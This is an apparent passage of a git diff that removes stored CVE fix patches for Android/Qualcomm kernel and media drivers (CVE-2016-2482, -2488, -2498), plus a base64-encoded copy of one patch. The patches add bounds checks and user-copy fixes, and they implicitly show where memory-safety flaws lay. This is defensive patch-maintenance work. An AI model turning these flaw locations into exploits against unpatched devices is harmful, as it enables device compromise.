iAgICAgICAgICAgICAgICAgaWYgKCFoYW5kbGUtPnZlbmNfc2V0X2NvbmZpZyhjb25maWdEYXRhLCAoT01YX0lOREVYVFlQRSlPTVhfSW5kZXhDb25maWdPcGVyYXRpbmdSYXRlKSkgewogICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRmFpbGVkIHRvIHNldCBPTVhfSW5kZXhDb25maWdPcGVyYXRpbmdSYXRlIik7CiAgICAgICAgICAgICAgICAgICAgIHJldHVybiBoYW5kbGUtPmh3X292ZXJsb2FkID8gT01YX0Vycm9ySW5zdWZmaWNpZW50UmVzb3VyY2VzIDoK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch
deleted file mode 100644
index 1f87b1be..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch
+++ /dev/null
@@ -1,131 +0,0 @@
-diff --git a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-index 120a11d..3d8ec9e 100644
---- a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-+++ b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-@@ -183,7 +183,7 @@
- #define DESC_BUFFER_SIZE (8192 * 16)
- 
- #ifdef _ANDROID_
--#define MAX_NUM_INPUT_OUTPUT_BUFFERS 32
-+#define MAX_NUM_INPUT_OUTPUT_BUFFERS 64
- #endif
- 
- #ifdef _ION_HEAP_MASK_COMPATIBILITY_WA
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 977aef2..95ffb98 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -3401,10 +3401,22 @@
-                                        break;
-                                    }
- 
--                                   if (!client_buffers.get_buffer_req(buffer_size)) {
-+                                   if (portDefn->nBufferCountActual > MAX_NUM_INPUT_OUTPUT_BUFFERS) {
-+                                       DEBUG_PRINT_ERROR("Requested o/p buf count (%u) exceeds limit (%u)",
-+                                               portDefn->nBufferCountActual, MAX_NUM_INPUT_OUTPUT_BUFFERS);
-+                                       eRet = OMX_ErrorBadParameter;
-+                                   } else if (!client_buffers.get_buffer_req(buffer_size)) {
-                                        DEBUG_PRINT_ERROR("Error in getting buffer requirements");
-                                        eRet = OMX_ErrorBadParameter;
-                                    } else if (!port_format_changed) {
-+
-+                                       // Buffer count can change only when port is disabled
-+                                       if (!release_output_done()) {
-+                                           DEBUG_PRINT_ERROR("Cannot change o/p buffer count since all buffers are not freed yet !");
-+                                           eRet = OMX_ErrorInvalidState;
-+                                           break;
-+                                       }
-+
-                                        if ( portDefn->nBufferCountActual >= drv_ctx.op_buf.mincount &&
-                                                portDefn->nBufferSize >=  drv_ctx.op_buf.buffer_size ) {
-                                            drv_ctx.op_buf.actualcount = portDefn->nBufferCountActual;
-@@ -3513,6 +3525,19 @@
-                                        eRet = OMX_ErrorBadParameter;
-                                        break;
-                                    }
-+                                   if (portDefn->nBufferCountActual > MAX_NUM_INPUT_OUTPUT_BUFFERS) {
-+                                       DEBUG_PRINT_ERROR("Requested i/p buf count (%u) exceeds limit (%u)",
-+                                               portDefn->nBufferCountActual, MAX_NUM_INPUT_OUTPUT_BUFFERS);
-+                                       eRet = OMX_ErrorBadParameter;
-+                                       break;
-+                                   }
-+                                   // Buffer count can change only when port is disabled
-+                                   if (!release_input_done()) {
-+                                       DEBUG_PRINT_ERROR("Cannot change i/p buffer count since all buffers are not freed yet !");
-+                                       eRet = OMX_ErrorInvalidState;
-+                                       break;
-+                                   }
-+
-                                    if (portDefn->nBufferCountActual >= drv_ctx.ip_buf.mincount
-                                            || portDefn->nBufferSize != drv_ctx.ip_buf.buffer_size) {
-                                        port_format_changed = true;
-@@ -5882,7 +5907,8 @@
-             nPortIndex = buffer - m_inp_heap_ptr;
- 
-         DEBUG_PRINT_LOW("free_buffer on i/p port - Port idx %d", nPortIndex);
--        if (nPortIndex < drv_ctx.ip_buf.actualcount) {
-+        if (nPortIndex < drv_ctx.ip_buf.actualcount &&
-+                BITMASK_PRESENT(&m_inp_bm_count, nPortIndex)) {
-             // Clear the bit associated with it.
-             BITMASK_CLEAR(&m_inp_bm_count,nPortIndex);
-             BITMASK_CLEAR(&m_heap_inp_bm_count,nPortIndex);
-@@ -5924,7 +5950,8 @@
-     } else if (port == OMX_CORE_OUTPUT_PORT_INDEX) {
-         // check if the buffer is valid
-         nPortIndex = buffer - client_buffers.get_il_buf_hdr();
--        if (nPortIndex < drv_ctx.op_buf.actualcount) {
-+        if (nPortIndex < drv_ctx.op_buf.actualcount &&
-+                BITMASK_PRESENT(&m_out_bm_count, nPortIndex)) {
-             DEBUG_PRINT_LOW("free_buffer on o/p port - Port idx %d", nPortIndex);
-             // Clear the bit associated with it.
-             BITMASK_CLEAR(&m_out_bm_count,nPortIndex);
-@@ -6576,7 +6603,14 @@
-     if (m_out_mem_ptr) {
-         DEBUG_PRINT_LOW("Freeing the Output Memory");
-         for (i = 0; i < drv_ctx.op_buf.actualcount; i++ ) {
--            free_output_buffer (&m_out_mem_ptr[i]);
-+            if (BITMASK_PRESENT(&m_out_bm_count, i)) {
-+                BITMASK_CLEAR(&m_out_bm_count, i);
-+                client_buffers.free_output_buffer (&m_out_mem_ptr[i]);
-+            }
-+
-+            if (release_output_done()) {
-+                break;
-+            }
-         }
- #ifdef _ANDROID_ICS_
-         memset(&native_buffer, 0, (sizeof(nativebuffer) * MAX_NUM_INPUT_OUTPUT_BUFFERS));
-@@ -6587,11 +6621,19 @@
-     if (m_inp_mem_ptr || m_inp_heap_ptr) {
-         DEBUG_PRINT_LOW("Freeing the Input Memory");
-         for (i = 0; i<drv_ctx.ip_buf.actualcount; i++ ) {
--            if (m_inp_mem_ptr)
--                free_input_buffer (i,&m_inp_mem_ptr[i]);
--            else
--                free_input_buffer (i,NULL);
--        }
-+
-+            if (BITMASK_PRESENT(&m_inp_bm_count, i)) {
-+                BITMASK_CLEAR(&m_inp_bm_count, i);
-+                if (m_inp_mem_ptr)
-+                    free_input_buffer (i,&m_inp_mem_ptr[i]);
-+                else
-+                    free_input_buffer (i,NULL);
-+            }
-+
-+            if (release_input_done()) {
-+                break;
-+            }
-+       }
-     }
-     free_input_buffer_header();
-     free_output_buffer_header();
-@@ -6993,7 +7035,7 @@
-     bool bRet = false;
-     unsigned i=0,j=0;
- 
--    DEBUG_PRINT_LOW("Value of m_out_mem_ptr %p",m_inp_mem_ptr);
-+    DEBUG_PRINT_LOW("Value of m_out_mem_ptr %p",m_out_mem_ptr);
-     if (m_out_mem_ptr) {
-         for (; j < drv_ctx.op_buf.actualcount ; j++) {
-             if (BITMASK_PRESENT(&m_out_bm_count,j)) {
diff --git a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch.base64
deleted file mode 100644
index 75b0e231..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL2luYy9vbXhfdmRlYy5oIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvaW5jL29teF92ZGVjLmgKaW5kZXggMTIwYTExZC4uM2Q4ZWM5ZSAxMDA2NDQKLS0tIGEvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvaW5jL29teF92ZGVjLmgKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvaW5jL29teF92ZGVjLmgKQEAgLTE4Myw3ICsxODMsNyBAQAogI2RlZmluZSBERVNDX0JVRkZFUl9TSVpFICg4MTkyICogMTYpCiAKICNpZmRlZiBfQU5EUk9JRF8KLSNkZWZpbmUgTUFYX05VTV9JTlBVVF9PVVRQVVRfQlVGRkVSUyAzMgorI2RlZmluZSBNQVhfTlVNX0lOUFVUX09VVFBVVF9CVUZGRVJTIDY0CiAjZW5kaWYKIAogI2lmZGVmIF9JT05fSEVBUF9NQVNLX0NPTVBBVElCSUxJVFlfV0EKZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcCBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcAppbmRleCA5NzdhZWYyLi45NWZmYjk4IDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmRlYy9zcmMvb214X3ZkZWNfbXNtODk3NC5jcHAKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvc3JjL29teF92ZGVjX21zbTg5NzQuY3BwCkBAIC0zNDAxLDEwICszNDAxLDIyIEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogCi0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICghY2xpZW50X2J1ZmZlcnMuZ2V0X2J1ZmZlcl9yZXEoYnVmZmVyX3NpemUpKSB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChwb3J0RGVmbi0+bkJ1ZmZlckNvdW50QWN0dWFsID4gTUFYX05VTV9JTlBVVF9PVVRQVVRfQlVGRkVSUykgeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIlJlcXVlc3RlZCBvL3AgYnVmIGNvdW50ICgldSkgZXhjZWVkcyBsaW1pdCAoJXUpIiwKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG9ydERlZm4tPm5CdWZmZXJDb3VudEFjdHVhbCwgTUFYX05VTV9JTlBVVF9PVVRQVVRfQlVGRkVSUyk7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gT01YX0Vycm9yQmFkUGFyYW1ldGVyOworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKCFjbGllbnRfYnVmZmVycy5nZXRfYnVmZmVyX3JlcShidWZmZXJfc2l6ZSkpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJFcnJvciBpbiBnZXR0aW5nIGJ1ZmZlciByZXF1aXJlbWVudHMiKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBPTVhfRXJyb3JCYWRQYXJhbWV0ZXI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSBpZiAoIXBvcnRfZm9ybWF0X2NoYW5nZWQpIHsKKworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLy8gQnVmZmVyIGNvdW50IGNhbiBjaGFuZ2Ugb25seSB3aGVuIHBvcnQgaXMgZGlzYWJsZWQKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICghcmVsZWFzZV9vdXRwdXRfZG9uZSgpKSB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIkNhbm5vdCBjaGFuZ2Ugby9wIGJ1ZmZlciBjb3VudCBzaW5jZSBhbGwgYnVmZmVycyBhcmUgbm90IGZyZWVkIHlldCAhIik7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZVJldCA9IE9NWF9FcnJvckludmFsaWRTdGF0ZTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KKwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCBwb3J0RGVmbi0+bkJ1ZmZlckNvdW50QWN0dWFsID49IGRydl9jdHgub3BfYnVmLm1pbmNvdW50ICYmCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBvcnREZWZuLT5uQnVmZmVyU2l6ZSA+PSAgZHJ2X2N0eC5vcF9idWYuYnVmZmVyX3NpemUgKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZHJ2X2N0eC5vcF9idWYuYWN0dWFsY291bnQgPSBwb3J0RGVmbi0+bkJ1ZmZlckNvdW50QWN0dWFsOwpAQCAtMzUxMyw2ICszNTI1LDE5IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gT01YX0Vycm9yQmFkUGFyYW1ldGVyOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHBvcnREZWZuLT5uQnVmZmVyQ291bnRBY3R1YWwgPiBNQVhfTlVNX0lOUFVUX09VVFBVVF9CVUZGRVJTKSB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiUmVxdWVzdGVkIGkvcCBidWYgY291bnQgKCV1KSBleGNlZWRzIGxpbWl0ICgldSkiLAorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0RGVmbi0+bkJ1ZmZlckNvdW50QWN0dWFsLCBNQVhfTlVNX0lOUFVUX09VVFBVVF9CVUZGRVJTKTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBPTVhfRXJyb3JCYWRQYXJhbWV0ZXI7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvLyBCdWZmZXIgY291bnQgY2FuIGNoYW5nZSBvbmx5IHdoZW4gcG9ydCBpcyBkaXNhYmxlZAorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoIXJlbGVhc2VfaW5wdXRfZG9uZSgpKSB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiQ2Fubm90IGNoYW5nZSBpL3AgYnVmZmVyIGNvdW50IHNpbmNlIGFsbCBidWZmZXJzIGFyZSBub3QgZnJlZWQgeWV0ICEiKTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBPTVhfRXJyb3JJbnZhbGlkU3RhdGU7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQorCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChwb3J0RGVmbi0+bkJ1ZmZlckNvdW50QWN0dWFsID49IGRydl9jdHguaXBfYnVmLm1pbmNvdW50CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfHwgcG9ydERlZm4tPm5CdWZmZXJTaXplICE9IGRydl9jdHguaXBfYnVmLmJ1ZmZlcl9zaXplKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0X2Zvcm1hdF9jaGFuZ2VkID0gdHJ1ZTsKQEAgLTU4ODIsNyArNTkwNyw4IEBACiAgICAgICAgICAgICBuUG9ydEluZGV4ID0gYnVmZmVyIC0gbV9pbnBfaGVhcF9wdHI7CiAKICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJmcmVlX2J1ZmZlciBvbiBpL3AgcG9ydCAtIFBvcnQgaWR4ICVkIiwgblBvcnRJbmRleCk7Ci0gICAgICAgIGlmIChuUG9ydEluZGV4IDwgZHJ2X2N0eC5pcF9idWYuYWN0dWFsY291bnQpIHsKKyAgICAgICAgaWYgKG5Qb3J0SW5kZXggPCBkcnZfY3R4LmlwX2J1Zi5hY3R1YWxjb3VudCAmJgorICAgICAgICAgICAgICAgIEJJVE1BU0tfUFJFU0VOVCgmbV9pbnBfYm1fY291bnQsIG5Qb3J0SW5kZXgpKSB7CiAgICAgICAgICAgICAvLyBDbGVhciB0aGUgYml0IGFzc29jaWF0ZWQgd2l0aCBpdC4KICAgICAgICAgICAgIEJJVE1BU0tfQ0xFQVIoJm1faW5wX2JtX2NvdW50LG5Qb3J0SW5kZXgpOwogICAgICAgICAgICAgQklUTUFTS19DTEVBUigmbV9oZWFwX2lucF9ibV9jb3VudCxuUG9ydEluZGV4KTsKQEAgLTU5MjQsNyArNTk1MCw4IEBACiAgICAgfSBlbHNlIGlmIChwb3J0ID09IE9NWF9DT1JFX09VVFBVVF9QT1JUX0lOREVYKSB7CiAgICAgICAgIC8vIGNoZWNrIGlmIHRoZSBidWZmZXIgaXMgdmFsaWQKICAgICAgICAgblBvcnRJbmRleCA9IGJ1ZmZlciAtIGNsaWVudF9idWZmZXJzLmdldF9pbF9idWZfaGRyKCk7Ci0gICAgICAgIGlmIChuUG9ydEluZGV4IDwgZHJ2X2N0eC5vcF9idWYuYWN0dWFsY291bnQpIHsKKyAgICAgICAgaWYgKG5Qb3J0SW5kZXggPCBkcnZfY3R4Lm9wX2J1Zi5hY3R1YWxjb3VudCAmJgorICAgICAgICAgICAgICAgIEJJVE1BU0tfUFJFU0VOVCgmbV9vdXRfYm1fY291bnQsIG5Qb3J0SW5kZXgpKSB7CiAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImZyZWVfYnVmZmVyIG9uIG8vcCBwb3J0IC0gUG9ydCBpZHggJWQiLCBuUG9ydEluZGV4KTsKICAgICAgICAgICAgIC8vIENsZWFyIHRoZSBiaXQgYXNzb2NpYXRlZCB3aXRoIGl0LgogICAgICAgICAgICAgQklUTUFTS19DTEVBUigmbV9vdXRfYm1fY291bnQsblBvcnRJbmRleCk7CkBAIC02NTc2LDcgKzY2MDMsMTQgQEAKICAgICBpZiAobV9vdXRfbWVtX3B0cikgewogICAgICAgICBERUJVR19QUklOVF9MT1coIkZyZWVpbmcgdGhlIE91dHB1dCBNZW1vcnkiKTsKICAgICAgICAgZm9yIChpID0gMDsgaSA8IGRydl9jdHgub3BfYnVmLmFjdHVhbGNvdW50OyBpKysgKSB7Ci0gICAgICAgICAgICBmcmVlX291dHB1dF9idWZmZXIgKCZtX291dF9tZW1fcHRyW2ldKTsKKyAgICAgICAgICAgIGlmIChCSVRNQVNLX1BSRVNFTlQoJm1fb3V0X2JtX2NvdW50LCBpKSkgeworICAgICAgICAgICAgICAgIEJJVE1BU0tfQ0xFQVIoJm1fb3V0X2JtX2NvdW50LCBpKTsKKyAgICAgICAgICAgICAgICBjbGllbnRfYnVmZmVycy5mcmVlX291dHB1dF9idWZmZXIgKCZtX291dF9tZW1fcHRyW2ldKTsKKyAgICAgICAgICAgIH0KKworICAgICAgICAgICAgaWYgKHJlbGVhc2Vfb3V0cHV0X2RvbmUoKSkgeworICAgICAgICAgICAgICAgIGJyZWFrOworICAgICAgICAgICAgfQogICAgICAgICB9CiAjaWZkZWYgX0FORFJPSURfSUNTXwogICAgICAgICBtZW1zZXQoJm5hdGl2ZV9idWZmZXIsIDAsIChzaXplb2YobmF0aXZlYnVmZmVyKSAqIE1BWF9OVU1fSU5QVVRfT1VUUFVUX0JVRkZFUlMpKTsKQEAgLTY1ODcsMTEgKzY2MjEsMTkgQEAKICAgICBpZiAobV9pbnBfbWVtX3B0ciB8fCBtX2lucF9oZWFwX3B0cikgewogICAgICAgICBERUJVR19QUklOVF9MT1coIkZyZWVpbmcgdGhlIElucHV0IE1lbW9yeSIpOwogICAgICAgICBmb3IgKGkgPSAwOyBpPGRydl9jdHguaXBfYnVmLmFjdHVhbGNvdW50OyBpKysgKSB7Ci0gICAgICAgICAgICBpZiAobV9pbnBfbWVtX3B0cikKLSAgICAgICAgICAgICAgICBmcmVlX2lucHV0X2J1ZmZlciAoaSwmbV9pbnBfbWVtX3B0cltpXSk7Ci0gICAgICAgICAgICBlbHNlCi0gICAgICAgICAgICAgICAgZnJlZV9pbnB1dF9idWZmZXIgKGksTlVMTCk7Ci0gICAgICAgIH0KKworICAgICAgICAgICAgaWYgKEJJVE1BU0tfUFJFU0VOVCgmbV9pbnBfYm1fY291bnQsIGkpKSB7CisgICAgICAgICAgICAgICAgQklUTUFTS19DTEVBUigmbV9pbnBfYm1fY291bnQsIGkpOworICAgICAgICAgICAgICAgIGlmIChtX2lucF9tZW1fcHRyKQorICAgICAgICAgICAgICAgICAgICBmcmVlX2lucHV0X2J1ZmZlciAoaSwmbV9pbnBfbWVtX3B0cltpXSk7CisgICAgICAgICAgICAgICAgZWxzZQorICAgICAgICAgICAgICAgICAgICBmcmVlX2lucHV0X2J1ZmZlciAoaSxOVUxMKTsKKyAgICAgICAgICAgIH0KKworICAgICAgICAgICAgaWYgKHJlbGVhc2VfaW5wdXRfZG9uZSgpKSB7CisgICAgICAgICAgICAgICAgYnJlYWs7CisgICAgICAgICAgICB9CisgICAgICAgfQogICAgIH0KICAgICBmcmVlX2lucHV0X2J1ZmZlcl9oZWFkZXIoKTsKICAgICBmcmVlX291dHB1dF9idWZmZXJfaGVhZGVyKCk7CkBAIC02OTkzLDcgKzcwMzUsNyBAQAogICAgIGJvb2wgYlJldCA9IGZhbHNlOwogICAgIHVuc2lnbmVkIGk9MCxqPTA7CiAKLSAgICBERUJVR19QUklOVF9MT1coIlZhbHVlIG9mIG1fb3V0X21lbV9wdHIgJXAiLG1faW5wX21lbV9wdHIpOworICAgIERFQlVHX1BSSU5UX0xPVygiVmFsdWUgb2YgbV9vdXRfbWVtX3B0ciAlcCIsbV9vdXRfbWVtX3B0cik7CiAgICAgaWYgKG1fb3V0X21lbV9wdHIpIHsKICAgICAgICAgZm9yICg7IGogPCBkcnZfY3R4Lm9wX2J1Zi5hY3R1YWxjb3VudCA7IGorKykgewogICAgICAgICAgICAgaWYgKEJJVE1BU0tfUFJFU0VOVCgmbV9vdXRfYm1fY291bnQsaikpIHsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2488/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2488/ANY/0001.patch
deleted file mode 100644
index b8f17f35..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2488/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 91ea960b91250eca57d8fbdb8aafa11d80695d46 Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M <vtmuni@codeaurora.org>
-Date: Wed, 8 Jun 2016 16:32:11 +0530
-Subject: msm: camera: ispif: Validate VFE num input during reset
-
-Userspace supplies the actual number of used VFEs in session to ISPIF.
-Validate the userspace input value and if found to be invalid, return
-error.
-
-CRs-Fixed: 898074
-Signed-off-by: Venu Yeshala <vyeshala@codeaurora.org>
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
-Change-Id: I3288ddb6404e817a705a92281b4c54666f372c56
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 7fb1ac1..94735fd 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -1133,9 +1133,13 @@ static irqreturn_t msm_io_ispif_irq(int irq_num, void *data)
- static int msm_ispif_set_vfe_info(struct ispif_device *ispif,
- 	struct msm_ispif_vfe_info *vfe_info)
- {
--	memcpy(&ispif->vfe_info, vfe_info, sizeof(struct msm_ispif_vfe_info));
--	if (ispif->vfe_info.num_vfe > ispif->hw_num_isps)
-+	if (!vfe_info || (vfe_info->num_vfe <= 0) ||
-+		((uint32_t)(vfe_info->num_vfe) > ispif->hw_num_isps)) {
-+		pr_err("Invalid VFE info: %p %d\n", vfe_info,
-+			(vfe_info ? vfe_info->num_vfe:0));
- 		return -EINVAL;
-+	}
-+	memcpy(&ispif->vfe_info, vfe_info, sizeof(struct msm_ispif_vfe_info));
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch
deleted file mode 100644
index 2b3c646e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch
+++ /dev/null
@@ -1,303 +0,0 @@
-From 1d23dacdbd6b3a2b59b952f2fa3a578f9d15f60f Mon Sep 17 00:00:00 2001
-From: Arif Hussain <c_arifh@qca.qualcomm.com>
-Date: Mon, 11 Nov 2013 22:59:34 -0800
-Subject: wlan:  wlan_hdd_wext Userspace data copy fix
-
-Use copy_to_user and copy_from_user for
-copying data to/from user space.
-
-Change-Id: I98fb6352b654af8f78160738e7ccd902c3c70031
-CRs-Fixed: 561028
----
- CORE/HDD/src/wlan_hdd_wext.c | 75 +++++++++++++++++++++++++-------------------
- 1 file changed, 42 insertions(+), 33 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 83107e1..1e9ba2e 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1529,7 +1529,7 @@ static int iw_set_genie(struct net_device *dev,
- {
-    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
--    u_int8_t *genie;
-+    u_int8_t *genie = (u_int8_t *)extra;
-     v_U16_t remLen;
- 
-    ENTER();
-@@ -1544,7 +1544,6 @@ static int iw_set_genie(struct net_device *dev,
-       return 0;
-    }
- 
--    genie = wrqu->data.pointer;
-     remLen = wrqu->data.length;
- 
-     hddLog(LOG1,"iw_set_genie ioctl IE[0x%X], LEN[%d]\n", genie[0], genie[1]);
-@@ -1672,9 +1671,14 @@ static int iw_get_genie(struct net_device *dev,
-                                    pAdapter->sessionId,
-                                    &length,
-                                    genIeBytes);
--    wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
--
--    vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+    length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
-+    if (wrqu->data.length < length)
-+    {
-+        hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+        return -EFAULT;
-+    }
-+    vos_mem_copy( extra, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+    wrqu->data.length = length;
- 
-     hddLog(LOG1,"%s: RSN IE of %d bytes returned\n", __func__, wrqu->data.length );
- 
-@@ -2364,7 +2368,7 @@ static int iw_get_rssi(struct net_device *dev,
-                        union iwreq_data *wrqu, char *extra)
- {
-    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--   char *cmd = (char*)wrqu->data.pointer;
-+   char *cmd = extra;
-    int len = wrqu->data.length;
-    v_S7_t s7Rssi = 0;
-    hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-@@ -2621,7 +2625,7 @@ static int iw_set_priv(struct net_device *dev,
-                        union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    char *cmd = (char*)wrqu->data.pointer;
-+    char *cmd = extra;
-     int cmd_len = wrqu->data.length;
-     int ret = 0;
-     int status = 0;
-@@ -2875,6 +2879,16 @@ done:
-        /* there was an encoding error or overflow */
-        status = -EIO;
-     }
-+    else if (ret > 0)
-+    {
-+       if (copy_to_user(wrqu->data.pointer, cmd, ret))
-+       {
-+          hddLog(VOS_TRACE_LEVEL_ERROR,
-+                 "%s: failed to copy data to user buffer", __func__);
-+          return -EFAULT;
-+       }
-+       wrqu->data.length = ret;
-+    }
- 
-     if (ioctl_debug)
-     {
-@@ -2882,7 +2896,6 @@ done:
-                __func__, cmd, wrqu->data.length, status);
-     }
-     return status;
--
- }
- 
- static int iw_set_nick(struct net_device *dev,
-@@ -3827,7 +3840,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif /* WLAN_FEATURE_VOWIFI */
- 
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
--    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-@@ -3840,11 +3853,11 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-     {
